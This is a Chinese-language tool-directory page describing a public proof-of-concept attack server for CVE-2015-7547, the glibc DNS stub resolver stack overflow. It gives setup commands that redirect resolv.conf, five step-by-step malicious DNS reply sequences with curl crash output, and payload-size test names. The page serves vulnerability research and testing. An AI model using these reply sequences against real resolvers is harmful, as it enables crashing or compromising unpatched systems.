Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
cve-2015-7547-public — PoC攻击服务器,针对CVE-2015-7547在glibc DNS存根解析器中的缓冲区溢出漏洞(公开版本) | Kitploit
工具/GitHubGitHub/esentire/cve-2015-7547-public
漏洞分析漏洞利用模糊测试渗透测试DNS 分析二进制利用Archived
GitHubesentire/cve-2015-7547-public

cve-2015-7547-public

PoC攻击服务器,针对CVE-2015-7547在glibc DNS存根解析器中的缓冲区溢出漏洞(公开版本)

查看仓库
10510年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

PoC 攻击服务器 用于 CVE-2015-7547 glibc DNS stub 解析器漏洞

在本地机器上使用有漏洞的 glibc 版本进行测试:

root@kitploit:~
user@localhost:/$ echo 'nameserver 127.0.0.127' | sudo tee /etc/resolv.conf
user@localhost:/$ echo 'nameserver 127.0.0.127' | sudo tee -a /etc/resolv.conf
user@localhost:/$ sudo python3 attack-server.py 127.0.0.127
Starting UDP server on 127.0.0.127:53...
Starting TCP server on 127.0.0.127:53...

然后,在另一个终端会话中,按以下示例执行攻击。

攻击 1 (UDP+TCP)

需要能够通过 UDP 和 TCP 发送大于 2048 字节的回复。

攻击序列:

  1. UDP 回复,> 2048 字节,有效头/问题,TC 标志置位(触发缓冲区管理不当和 TCP 重试)

  2. TCP 回复,有效头/问题(强制下一个回复存储到栈分配缓冲区)

  3. TCP 回复,> 2048 字节(溢出栈分配缓冲区)

示例:

root@kitploit:~
user@localhost:/$ curl http://attack1
*** stack smashing detected ***: curl terminated
Segmentation fault (core dumped)

攻击 2 (仅 UDP)

需要能够通过 UDP 发送大于 2048 字节的回复。

攻击序列:

  1. UDP 回复,> 2048 字节,无效头(触发缓冲区管理不当,不计为有效响应)

  2. 忽略下一个请求(由于轮询超时触发 UDP 重试)

  3. UDP 回复,有效头/问题(强制下一个回复存储到栈分配缓冲区)

  4. UDP 回复,> 2048 字节(溢出栈分配缓冲区)

示例:

root@kitploit:~
user@localhost:/$ curl http://attack2
*** stack smashing detected ***: curl terminated
Segmentation fault (core dumped)

攻击 3 (UDP+TCP)

需要能够通过 UDP 发送大于 1024 字节的回复,并通过 TCP 发送大于 2048 字节的回复。

攻击序列:

  1. UDP 回复,1024 字节,有效头/问题(填满栈分配缓冲区的一半)

  2. UDP 回复,> 1024 字节,有效头/问题,TC 标志置位(触发缓冲区管理不当和 TCP 重试)

  3. TCP 回复,有效头/问题(强制下一个回复存储到栈分配缓冲区)

  4. TCP 回复,> 2048 字节(溢出栈分配缓冲区)

示例:

root@kitploit:~
user@localhost:/$ curl http://attack3
*** stack smashing detected ***: curl terminated
Segmentation fault (core dumped)

攻击 4 (仅 UDP)

需要能够通过 UDP 发送大于 2048 字节的回复。

攻击序列:

  1. UDP 回复,2048 字节,有效头/问题(填满栈分配缓冲区)

  2. UDP 回复(触发缓冲区管理不当和 UDP 重试,因为 0 字节套接字接收)

  3. UDP 回复,有效头/问题(强制下一个回复存储到栈分配缓冲区)

  4. UDP 回复,> 2048 字节(溢出栈分配缓冲区)

示例:

root@kitploit:~
user@localhost:/$ curl http://attack4
*** stack smashing detected ***: curl terminated
Segmentation fault (core dumped)

攻击 5 (仅 TCP)

需要能够通过 TCP 发送大于 2048 字节的回复,并且 /etc/resolv.conf 中至少有两个 nameserver 条目。

攻击序列:

  1. UDP 回复,有效头/问题,TC 标志置位(可选,如果初始查询通过 UDP 则触发 TCP 重试)

  2. TCP 回复,> 2048 字节(触发缓冲区管理不当)

  3. TCP 回复,空(触发 TCP 重试,因为 0 字节套接字接收)

  4. TCP 回复,有效头/问题(强制下一个回复存储到栈分配缓冲区)

  5. TCP 回复,> 2048 字节(溢出栈分配缓冲区)

示例:

root@kitploit:~
user@localhost:/$ curl http://attack5
*** stack smashing detected ***: curl terminated
Segmentation fault (core dumped)

有效载荷测试

要触发服务器返回指定大小的有效 A/AAAA 回复,请请求以下之一:

  • payload1 (> 64 字节)
  • payload2 (> 128 字节)
  • payload3 (> 256 字节)
  • payload4 (> 512 字节)
  • payload5 (> 1024 字节)
  • payload6 (> 2048 字节)
  • payload7 (> 4096 字节)
  • payload8 (> 8192 字节)

请求可以通过 UDP 或 TCP 发出,响应将包含适当数量的有效 A 或 AAAA 答案,以将回复填充到请求的大小。当 PoC 服务器设置为测试域的权威名称服务器时,这允许探索 DNS 缓存层次结构在面对超大回复时的行为。

示例:

root@kitploit:~
user@localhost:/$ curl http://payload1.somedomain.com
下载工具